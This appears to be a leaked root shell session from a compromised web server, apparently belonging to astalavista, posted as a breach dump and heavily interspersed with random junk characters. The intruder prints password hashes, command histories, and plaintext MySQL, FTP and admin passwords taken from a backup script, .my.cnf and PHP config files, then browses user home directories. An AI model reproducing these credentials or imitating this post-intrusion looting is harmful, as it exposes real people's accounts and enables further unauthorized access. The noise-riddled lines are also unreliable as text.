, s v2 E# _- L0 i+ X9 B5 Kcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
4 u! `" a% Q, e) zastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::7 ?( h+ Y0 A3 s1 v1 z( _
0 z$ f" ~3 h2 s( Q- \6 W H
sh-3.2# cat /etc/motd, S& A# Q( Z# p4 z f3 j
#####################################################
! z) E/ ^4 A1 ~+ o6 J; {4 t! c( F3 Y0 R0 h#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ # o9 S7 Y# f) F
# |__| [__ | |__| | |__| | | | [__ | |__| #* W2 }0 i' p' N& t4 K& L* p4 `" [
# | | ___] | | | |___ | | \/ | ___] | | | #
& P; ?( n7 ^. m4 U% a# {# #0 @& L/ S; k! f* }
#####################################################, f; L$ |# V+ \. h
# ## Y9 y* A& h2 {/ Z
# Admin Contact - 链接标记support@secureservertech.com #5 W( F2 s' }. O/ h
# #
+ n, q( H0 u' `. R& T9 _1 E# Available ShortCuts #6 g6 v& T* n. Q$ d
# #
! ?( F3 e: c j; z: z# nst - list active connections #+ [& A- d; o( u4 X- V
# ddos - shows how many times each ip is connected #
4 p& a1 f l; D, W# ltr - restart the webserver #
, |3 w$ ~, V" S: f7 W2 D: l2 z# phpc - edit the php config file #
, ?$ M( K6 e4 I' I0 Y" s# htc - edit the webserver configuration file #
& b& W% l7 ~9 `/ g5 X# up - uptime #3 {6 [$ X, C$ |1 @, ~3 F' E
# etd - edit the motd of the day file #
( o$ T# M6 H w4 e# htr - start and restart apache if needed #
3 L5 }* ^! ~2 Q6 @; n" I# syng - shows active SYN_RECV connections #* [* ~, h" {# E) X: m2 o9 n
# synd - syn flood blocker - “synd -h” for usage #
2 e0 v6 X! L6 M, V#####################################################
/ J* @9 |. c: N# NOTES: #
6 u4 ]8 L& u& ^/ z" I9 E# Last Upgrade - 12-08-2008 by JF #
/ o1 o% a2 ^1 g3 p4 U% r0 V# My.cnf/Mysql Optimization - 1-28-09 #
1 ~$ ^, [5 ]6 O: d) w2 {# #' o% \. c. j! s3 p; G
# #
2 i0 N% w( B* J" B; S' E# #
' T/ L$ F, d7 {9 z2 Z. r+ `% f# O j#####################################################3 H& @' F9 D" D3 s# E
6 @; ^+ i% `0 K5 H9 s: l% ash-3.2# lastlog | grep -v Never
8 C; u& k8 i) q' G8 a9 `: s& \4 LUsername Port From Latest
* a7 P% l$ e; L; Groot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
) X# A- o- M# kadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008 A8 V" i; F( c( W6 u6 O
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
2 Y" Q4 x( |( |% P) B6 qastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
5 Z2 O3 `/ {9 i$ ^7 N
) B! Q- b3 E$ S* Lsh-3.2# ls -la( i' K8 w$ p% @; X7 x% b {
total 453376+ n% t; m; i$ T& ]' |. P2 |% U
drwxr-x— 15 root root 4096 Jun 4 08:40 .
/ Q4 t1 C6 B+ A7 m# _4 h+ Sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 I2 R$ N6 M& g$ E% g( B% {. j-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip5 y5 \: i9 x' n1 k$ U/ f. n
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg9 X. \8 J7 ^- X* \6 k7 S! b* \4 A
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history6 z4 h! j) C( }+ G+ { n* U
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
2 T( A" ^# d! c6 X3 k-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
% G* W# P+ z3 K; p) t6 V% H6 h. \2 v-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
, |$ B/ n) Y! n O) J/ e-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
! Q6 U# i& `8 _5 Z6 d }# v+ ^% Y-rw-r–r– 1 root root 1327 Nov 29 2007 cert
! [. R# p9 \- e3 X-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql* m" z: {2 Z7 H4 \8 P: v
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan3 @7 X( }( i2 N; D. h6 N- e f
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc5 f7 b4 v% R& g
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql. E$ m( Z! F+ o4 d
drwx—— 2 root root 4096 Oct 28 2007 .elinks0 _4 N) P1 H& R1 j2 [% m
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1; X3 S0 Q: h1 q
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz20 z/ m" ^; F" Z0 B
-rw——- 1 root root 0 Apr 16 13:19 .history5 ]7 U4 |6 b* p6 L7 @
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log/ ~: ?& {& U. w" u
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
$ c1 s6 Z4 _# W" T* E-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh& @- u. g% B8 a E7 Z0 m
-rw——- 1 root root 35 Jun 2 14:23 .lesshst! R4 b3 |/ U- F* M; K
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp. p, n" y) C7 D& t" V' ^1 U- h
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
( F7 Q; b: _! t: H6 ~( L-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
) W# ]9 n' O& j) ~* W n# Y-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2: [5 R' l6 `4 V! Q
-rwx—— 1 root root 760 Sep 18 2008 lp( C* }/ ]' i" y! G4 m, p
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.18 K: B8 s7 s- J9 F7 i$ w) |; o
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
' [: V" h, g" J) v( ^7 \1 K' g5 f-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1- W7 K% S' H [( e5 u0 X2 r; X
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9# d" J5 g/ g' c
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz. r! {8 b( {; i9 t& ?$ `" b
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3" X' ~$ k ]4 j8 G- Y. ~# {7 {
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz% X7 X0 ]% d' z! _: p9 i; f
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh# C% k Z, T7 k E
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
$ b. G! T, i# w6 N% @+ m( G-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history# T2 N! D" ~- G# p
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
5 V+ |+ H$ v( P4 H2 G# C/ G. o- _-rw——- 1 root root 41 May 20 2008 .mytop
' k* N, H- k q( r4 d5 x8 ydrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.61 P9 x- ?$ J8 a1 P) T, T% s
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
5 w7 A0 T, l" h/ \drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
" X% Y$ t% B& p4 w4 i k; J-rw——- 1 root root 1462 Sep 21 2007 opt.php
2 C& v/ r* ?# [-rw-r–r– 1 root root 3371 Sep 22 2007 p* h0 h5 e m0 w) U% M6 {
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
/ [$ Q: e$ J* h) v7 R' J3 N# v3 I-rw——- 1 root root 1024 Feb 3 21:32 .rnd( f' T) z1 C7 n! ^/ }
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr, O1 @7 m. f0 {
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
: H7 g/ S7 A" i: fdrwx—— 2 root root 4096 Oct 10 2008 .ssh
- n. V0 O( b" R! a* I( m-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
2 e& c+ |, v' \# N3 n-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc- n% z8 ~ w a, _0 k; ]& r
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip) q0 L/ \0 `' ?! i
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.14 v( y- N$ g4 ], G
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp2 T8 i1 h6 o5 R/ G3 s; ?2 } W* `
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh" I' K) X+ p7 }+ l, F* G6 u% \0 U
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.00 s9 J4 p4 m* U8 V$ X& J& ]- T$ Y) E
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
8 n- R, t2 p \3 N0 O( X-rw——- 1 root root 12997 May 16 2008 .viminfo
* {! k1 d9 @/ u9 \ d+ T4 J% |8 b! j5 e6 \% g( z
sh-3.2# cat .bash_history
8 r# m; L3 |" p! P0 r- C$ h[snip]' D+ o. V4 b$ o+ D/ Z* U j+ w
wget cp4sst.com/sstlinux.tar.gz
2 a8 X. A% _- h; W* y8 {4 t* Mtar zxvf sstlinux.tar.gz
! I, B+ S5 a# d( t( ]+ Ocd linux-2.6.27.10+ a# ]0 u. z) ]) ]5 W) x* v: E, W
sh install.sh5 b9 @% U4 o0 a
make bzImage ; make modules ; make modules_install ; make install
2 D2 y' ^. y4 }: P: H& Zmake clean
M) X; r9 t1 I* D& rservice mysqld restart3 g9 r& ?& h7 L" q& U& O" q6 I
[snip]1 |* W4 G4 F" Q) f- W' x
cd /usr/sbin/8 @4 s2 R( ?3 {/ v
chmod 4777 traceroute
: m3 m" ]. r- V7 j$ y" n) Nchmod 4777 ping
0 c% U! q Q) L. ?& I; ztraceroute -I 链接标记[url]www.astalavista.ch[/url]
% N/ _4 Y) @# R[snip] u5 j9 I1 l) t* ]0 @ q- E1 y
vi /etc/csf/csf.conf
- N' {) H' j! W/ ~" P9 R" Utraceroute google.ch
- s7 I$ `# F4 ^% l9 o( A' nservice csf restart
6 ~: V R5 b0 ytracert google.ch9 H( r$ {( @4 L$ [7 i" ]5 a
service csf restart
; o) |7 u, g$ r$ H9 n6 u. o, _traceroute 链接标记[url]www.google.ch[/url]
8 t! a: G# \; R8 w% P/ Dtracert 链接标记[url]www.google.ch[/url]
; ~, D$ u1 {4 l2 v8 z6 V# U: }traceroute 链接标记[url]www.google.ch[/url]" v) G+ G* y" T# y3 h. n* O
locate traceroute
. E/ [) x/ X9 dchown 4755 /bin/traceroute) j# C% ?5 J7 b9 D( j8 \
chown 4777 /bin/traceroute) v* S3 {5 s. r8 B$ Q0 z' [0 o- `
locate ping! A) A8 m+ f7 F5 ` m: c9 P0 c- W
chown 4755 /bin/ping# O# k5 Q; k8 W2 Y; o
chown 4777 /bin/ping+ }/ K) ]5 ~0 |' P# O0 `$ G* X- ?
cd /bin/' v8 m* D1 R) ?. O
ls -ali | grep ping8 |0 t9 E" I- I4 ^
chown root ping- u R& S1 \3 I E7 u; L S
chmod 4755 ping2 \+ t& H1 _7 |( J; U
ls -ali | grep traceroute
* O0 D" Q% p. S( r; U$ E9 Xchown root traceroute
1 c8 _: }, C0 M7 z8 ^( Z# pchmod 4755 traceroute J- A* y% a2 w }6 T
ls -ali | grep traceroute
: A# Q! h' X2 L6 }traceroute -I 链接标记[url]www.google.ch[/url]
; H# F2 Y! P! s) M& n+ ttraceroute 链接标记[url]www.google.ch[/url]! S# Y: J/ P' U
whois pmsantos.ch
" T2 ?3 W6 S. E2 p; o[snip]5 ^* J7 p ?0 R
mysql -h com_contrexx2_live < /root/defaultp_ports.sql/ ^2 Q) H" z) }5 X* i. G
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql6 i, m6 P8 t* T! p% j" N3 d. b
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql% T* ^, V$ J/ y3 ~- U+ v2 L1 ~
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
* l% R- O6 v0 W7 q4 ]- utop
4 p7 M5 {0 o1 L1 V! Iping ssth.ch
5 W- D& N; }* K2 `ping asdlkfaljgasd???ljg???lasj.ch
6 O* o, Q: L# W- X7 C' U* x- Uping asdlkfaljgasdlasj.ch
; ?5 N; r0 |9 G$ }ping 链接标记[url]www.ssth.ch[/url]
* M8 p6 J& {- P$ Q5 j/ Y0 eping ssth.ch! C" H/ q0 ~( _7 g5 O9 q* p6 y% ^
nslookup 链接标记[url]www.google.ch[/url]
) f0 X9 c7 w, `6 D$ g0 rnslookup 链接标记[url]www.ssth.ch[/url]3 J0 M' W4 _! w8 w) Y) G
man nslookup- D$ E4 q b1 o1 g9 s
ping 链接标记[url]www.google.ch[/url]
( h' I) A1 R4 F* Z, v9 r2 {nslookup 链接标记[url]www.google.ch[/url]
2 L, O B( D6 v! K* N/ tnslookup 链接标记[url]www.google.ch[/url]
' z! Z6 \4 w& o+ _8 e- Q' }nslookup salfjasdlf.ch
3 g' D+ B, q5 j/ E$ z8 m8 j% e[snip]
l* J0 p2 r8 ]* z! B0 z* y* o# Fopenssl passwd -1 sadf( ?; e+ E d5 t' [* z0 u
openssl passwd -1 5cZNHstdTy+ A' k7 n/ D$ b" \8 ~) q
mysql& V% Y6 ]; m7 J
mysql7 h; J+ E% f1 J9 y- J
locate proftp9 l! `. c5 a' _; b8 u
vi /etc/proftpd.passwd" P9 `/ ^9 I7 c1 z% @
service proftpd restart+ K' |. w2 f2 L' ~. P( H. s
locate proftpd.conf2 l) m' V( i% j- ~) |
vi /etc/proftpd.conf9 ]. S( ~, \$ v9 y" q
vi /etc/proftpd.passwd( R' I3 c1 c: e. A9 g
service proftpd restart" x- F/ s3 ~" F
[snip]8 D5 w1 e! ]% [+ T: n, Y! Q
/bin/sh /home/com/backup_system/backup.sh
. K4 D4 ?; G. T$ m9 {. htar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
A" s: @$ ^) x3 t' `1 `mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql: G$ j# z2 d0 q0 @4 M3 j4 Y1 ?
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
6 f+ l! Z8 i+ A% D8 Tls -ali
8 x6 C" n; L; o, q Gmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql2 f' B( F% X+ t7 e
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql/ P8 }* ]6 I, m# m0 P5 ^
crontab -l
4 F! N' N! Z; R: Ocrontab -l
- ], t1 R( r3 b( U4 |php -q /home/com/public_html/modifications/cronjobs/securitynews.php
" P) q; z; a" ?+ m0 l5 Q4 I/home/com/public_html/modifications/cronjobs/exploits.sh
( H) O! W3 J; q0 nwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]0 p6 O | f8 F$ [3 o/ i
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
& Z9 N4 @) d9 @8 tcd lsws-4.0.3
0 ?1 X- B. f) W7 G' Ksh install.sh
! O5 u1 ?7 O% J' r0 S9 v4 k8 e( xuptime) M- D+ [1 `; F3 B9 ~
hdparm -tt /dev/sda
% d8 ^/ \5 {- b* T t4 Kiostat2 Y- {; Z$ E' ]
yum install iostat$ g# Q- h9 K7 H) H/ h1 ?; E
iostat6 h& F! T% X9 z7 x
whereis iostat/ y; ~& K; H& I- q7 |
yjm clean all
6 ^/ E5 N- Z& i @: _8 Qyum clean all ; yum -y update
% b, m" j* i9 Q6 L7 B2 L! Qiostat
0 ^# s1 L* U0 P* ]+ ?6 m$ s& v- j# uyum install systat" N [+ d4 Z a
rpm -qa | grep iostat" l# h" e4 `/ @
rpm -qa | grep sysstat- g% N# K' G b; {
rpm -qa | grep systat
( t5 {) n" ?/ ^6 V3 sdmesg -c* d: ~7 U3 D0 Q: w
sysctl -p0 m. G. {; L! x' g2 D/ S' v7 ^, F
uname -r9 o9 B. [6 W8 ~. F
cd /usr/src% @# W8 n! N7 Z e4 j# I
wget nix101.com/kernels/sstlinux.tar.gz/ C5 q3 u: {& v' @7 [2 [% Q0 D' D
shutdown -r now* J5 a& @: H" K6 _( {
nano -w /boot/grub/grub.conf
J% G# a* ^- D. ?* A! h
, \" J8 h, F& w( K/ msh-3.2# cat .my.cnf
( V( A0 n& t y% c: A$ _* E[client], K/ Z5 Z( n: B6 z7 S: D
user=da_admin* h' j# ]! N. u3 U
password=X9dctmRH
1 V2 R+ I6 S: ^/ ], @
( `' O6 s4 t9 P7 a* e- X' R8 _sh-3.2# cat /home/com/backup_system/backup.sh
# \' \% o2 f( ]#!/bin/sh8 S# m3 q) G+ W& Z. B. e# c0 v
#####################################################################
1 W; j, W# d/ V0 r& l# #
' J( _2 n/ c1 f* H# incremental backup for astalavista.com ## B; `2 M( a5 [5 q
# #9 H7 k \7 ^ s: t
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #4 w$ A$ E) m& D$ Y6 f: U
# #
( Z/ F) Y |) j2 w* J#####################################################################
: B7 E( ^- S2 `! x0 e[snip]1 R4 {/ ?6 O7 ` a4 W
PROG_DIR=”/home/com/backup_system”;
9 N; E+ q) c2 D" U. L) W7 b# uBACKUP_DIR=”/home/com/backups”;
9 h6 [+ G; n( h" S/ g* _; YDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;% ?* s4 v8 B V& Q' H
# ftp for synology backup server
r) n) U: d9 D8 r& OFTP_HOST=”212.254.194.163″;
+ m- r3 j7 k( ~. B' B0 MFTP_PORT=”21″;
3 q$ ]" n- [- Y+ aFTP_USER=”astalavista.com”;
5 h! ^& K% T/ a. |FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
6 ?5 Q% W- Q. uFTP_DIR=”/astalavista.com”;! B s. }7 ]( s! T4 t p" H# k
# database
v% T( [- u" B1 sDB_HOST=”localhost”;& t/ u! O% F# _
DB_USER=”contrexxuser2″;
" m5 q- g" E% ~' A1 H3 l# F, c$ eDB_PASS=”0fEYNZgXz1pKe”;" N7 X7 ^ o& [, H
DB_DATABASE1=”com_contrexx2_live”;
, B. ~0 }2 k/ }. m, C$ QDB_DATABASE2=”com_contrexx2″;; Q& O# l6 e$ H7 w, V+ H
[snip]6 l6 N- U W8 g5 z4 e D( N
ftp -in $FTP_HOST $FTP_PORT <<EOF* X8 }9 L/ R! w1 A1 F3 B# h) Z
quote USER $FTP_USER5 ^! E0 q V! z3 _3 [
quote PASS $FTP_PASS
( b# a; o: L- H* H) O6 b* I. r) [cd $FTP_DIR
1 F. F4 E3 w! K6 d2 j5 vput $DB_FULLNAME-SQL_Dump.tar# |6 e/ [4 c7 y8 L
put $BACKUP_FULLNAME-Public_HTML.tar
9 T; d2 E+ J# \close. u& {7 U' O, q
bye
& `2 d& d9 V8 O1 M, BEOF" \1 f; c# n, K7 Y$ F
+ x# N6 \; m# }2 S' {6 S7 s# W
sh-3.2# cd /home( L6 [ Z8 B3 j- k" m
sh-3.2# ls -la% m8 P1 a& a* b5 k! V
total 1201 Z9 B8 \& N9 ?
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 M& I2 d7 I) s# q3 Y6 t* Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 `9 D: [# X7 ~$ A; F( f/ e
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin# M6 a4 u+ n3 o/ n
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( s* w% P5 c& f( B-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
; [5 \$ C" d) c# l4 h# h! W2 ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet$ L2 ~ u6 d M0 R- [+ `5 e
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup* |# u/ J; M# d4 t6 F" E2 V; _. O' A# f
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
7 V8 A' }5 l. h. H5 B2 C2 U+ n$ Idrwx–x–x 10 com com 4096 Apr 28 12:40 com
5 D- m* U+ q, n7 B/ qdrwxr-xr-x 2 root root 4096 May 17 2007 ftp$ G( }9 A5 I# K. V: f1 t [4 L' G
drwx—— 3 jon jon 4096 Sep 21 2007 jon* ^: W4 m6 T) m- q; o( A6 X. r
drwx—— 2 root root 16384 Sep 11 2007 lost+found' ^6 K- X( o6 z6 G; V0 |+ `
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
7 L# m s# T" u, v* h Vdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata9 P6 S, y9 P+ n: a/ a
drwx—— 2 jon jon 4096 Sep 15 2007 test
1 f: ~! `% K7 G5 _" D3 v* q/ [drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp+ y% ~# d* e9 S: S! ^/ G/ |
* L" T, b! Y- E5 J4 Ysh-3.2# cd admin
$ x3 b8 x/ m: \sh-3.2# ls -la
1 T0 x9 d. q7 U% A: T' C* Wtotal 1735896
$ [- ~3 N, }8 o* x5 }8 E/ O; R8 ndrwx–x–x 9 admin admin 4096 Nov 28 2007 .) o$ T, R# I, ~3 {8 o# c' d% c
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 Q7 N. d4 Z; o1 j5 x1 Odrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups* [6 O( [7 f" } X: n0 I
drwx—— 2 admin admin 4096 Sep 28 2007 backups1 q Z ^3 }8 E* U9 y2 ?
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history( R# N5 K m | Q
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
6 }0 T q g8 b-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile3 O: Q) q# _ P* f4 h6 V$ m
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
0 ]( D' {: g; U8 ] X3 ?% edrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
/ b% ]; p; M6 \* I4 vdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains- [" ?- [" {9 e r6 F0 f+ z: }
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap3 z( T4 M+ z! k8 v: M- B) k
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
( B5 _! \) ?4 k C4 y% M: [ ndrwx—— 2 admin admin 4096 Sep 21 2007 mail4 x" _5 I R6 ^/ C
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* W/ u0 ^ o, V' q) D4 o-rw-r–r– 1 root root 887 Nov 28 2007 server.key7 v& L9 t3 W' h
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow8 _/ ?, @8 b/ y) @( c, b
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
7 {, I Z; {8 v# R3 Z2 Tdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
" o, F$ R0 G' t g% Y, ]6 P, J$ M7 V! c' X' f! k0 ?; U* c/ @
sh-3.2# ..# Z* u# Y, H- P# [7 S
sh-3.2# cd jon
7 y- \ c; {# a! Ysh-3.2# ls -la: v9 S7 e, ]( w2 k
total 366 B' v( e* t6 G% J! a/ e( b2 ^
drwx—— 3 jon jon 4096 Sep 21 2007 .
5 G7 M, n; W8 Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .." \0 {6 j1 G/ b# @' a- H
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history" D5 P H/ Y# b. a; y6 e v& U: U
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout1 V& m+ Q! O- k+ H1 _$ ?4 A( x) ]
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile) ^$ S6 i# @+ |
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
- @# G3 r5 `: l! b8 ^4 X-rw-r–r– 1 root root 24 Sep 21 2007 info.php' w: G7 ~3 b" k; \1 h1 D
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
( f2 e: H" v' Z. ~% G! F# c" m! G" ^* T- g5 `7 |
sh-3.2# cd ..' M! w% {1 f- m" H: {8 o, i
sh-3.2# cd test
% d! N) X6 S: [, Xsh-3.2# ls -la
1 t+ {' d/ K4 H) e+ N3 btotal 480 `, D3 I, o0 u0 `, T$ J b" a
drwx—— 2 jon jon 4096 Sep 15 2007 .
% J8 B4 A7 N! Y7 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ @& H% ?' q5 E% @
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history7 U$ S& G6 ~2 a4 R" x
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout1 z0 n% p! |& f- B, O
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile6 T$ c4 F' l7 s* H+ E
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc! j% v! W/ ] M2 i8 P4 O5 T
sh-3.2# cat .bash_history: J8 t* i( @( l0 ~; w3 ^
/usr/bin/mysqladmin -u root password PoliuJhytg679 Y1 O5 i& K" ^7 L5 o, [* H- [
) B4 J3 i2 ]. H( y) X& d
sh-3.2# cd ..+ R$ e& L/ R( f, T
sh-3.2# cd astanet! n9 g+ T8 L$ T* t1 ?( s5 F. S
sh-3.2# ls -la
; q' N% E! }# h, W! \5 K6 wtotal 52# j: q! {6 ~0 p* j; B
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .- ~, L" |- n3 ~& H; M0 ^2 q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 N% {& \% D& `3 p9 }drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
) I' ~& I& p7 W) W7 L-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history7 M A u. [8 n$ S8 x2 g% Y- F
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
* c8 q! I# g$ j1 b2 u-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile5 j2 n k0 G2 N
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
; g( M" V( t" i, j! T5 `4 Qdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
1 a! C( S) y2 |# ?, s, Wdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. Z2 I1 h7 o! B K8 J. m. c
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail8 m* j% M4 D& e+ d, N5 z8 _/ N
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 P+ n& [3 V$ K3 J3 o0 ?3 U# h
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html" O6 ]5 \3 i+ g
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
0 C" Z+ r3 I5 n3 v+ H! H9 U, u; T5 G: f. [$ S7 }
sh-3.2# cd auth/
$ b! g5 ^* _0 y |2 P. Zsh-3.2# ls -la
$ W" R5 \4 g3 s# y Q5 G7 ?3 vtotal 28
$ M/ N: j0 |% L" A; P ]drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
w& E' P: F9 O1 S6 }. V+ P" c- y" Qdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
: F, Z) s0 [+ D, `2 Z" A: M5 z/ Z-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
X1 t4 P/ }( r1 ~) a9 L-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php( @1 j4 u5 n7 `
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd% n' L/ i ~, p% _8 E, G
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting/ _2 ^! O* {1 D* w" C' } D
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd: y! W& u1 o0 a/ G; o
, R6 n: H4 B! K T" R
sh-3.2# cat hackercontest.config.inc.php
, r4 q2 B- a } v8 A<?PHP
2 e0 {- k# C U% D' m# p- p3 ]+ u// Variabeln f?r Verbindung zur Datenbank //' w" B8 k8 j( A! c, D
$conxHost = ‘localhost’; // MySQL hostname
4 d$ l2 {2 h+ Y7 p$conxUser = ‘hackercontest’; // MySQL user
" D5 l$ l& U, V1 ^" p$conxPassword = ‘K6m@7dUc’; // MySQL password& k% k" P% n! P4 p, |
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
2 R4 Q4 T, t& Y+ Y) V5 z?>
6 M. I& a8 W' P! t% `, `sh-3.2# cat hosting.config.inc.php
8 @3 e/ p3 ]% Q4 v4 P7 [<?PHP5 n3 v0 Z2 M$ @/ |
// Variabeln f?r Verbindung zur Datenbank //& B/ c, F8 Q% {0 @/ y% [7 s% H
$conxHost = ‘localhost’; // MySQL hostname. V5 {. N0 a* m8 V1 r
$conxUser = ‘hostinguser’; // MySQL user
' w4 B( G7 F5 d7 N$conxPassword = ‘cXvB3981′; // MySQL password
